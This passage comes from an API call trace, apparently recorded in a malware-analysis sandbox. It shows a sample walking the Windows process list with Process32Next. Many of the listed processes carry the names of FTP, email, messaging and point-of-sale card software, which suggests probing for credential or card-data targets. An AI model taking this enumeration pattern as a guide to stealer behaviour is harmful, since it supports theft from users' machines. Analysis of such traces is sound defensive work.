cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.316] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.318] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.319] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.321] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.322] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.337] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.340] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0201.341] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0201.343] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0201.344] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.346] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.347] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0201.349] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0201.351] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0201.352] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.353] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.355] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0201.361] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0201.363] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.365] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0201.367] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0201.373] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0201.375] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0201.377] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0201.379] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0201.382] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0201.384] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0201.437] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0201.439] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0201.441] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0201.442] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0201.444] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0201.446] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0201.447] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0201.452] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0201.453] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0201.455] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0201.457] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0201.459] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0201.460] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0201.462] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0201.464] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0201.472] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0201.475] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0201.477] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0201.558] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0201.562] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0201.565] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0201.568] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0201.570] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0201.572] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0201.577] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0201.579] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0201.581] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0201.583] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0201.585] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0201.588] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0201.593] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0201.596] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0201.599] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0201.602] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0201.625] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0201.627] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0201.628] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0201.630] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0201.632] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0201.634] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0201.638] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0201.640] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0201.642] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0201.644] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0201.645] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0201.647] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0201.649] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0201.651] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0201.656] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0201.658] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0201.659] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0201.661] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0201.663] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0201.664] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0201.666] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0201.723] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0201.727] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, 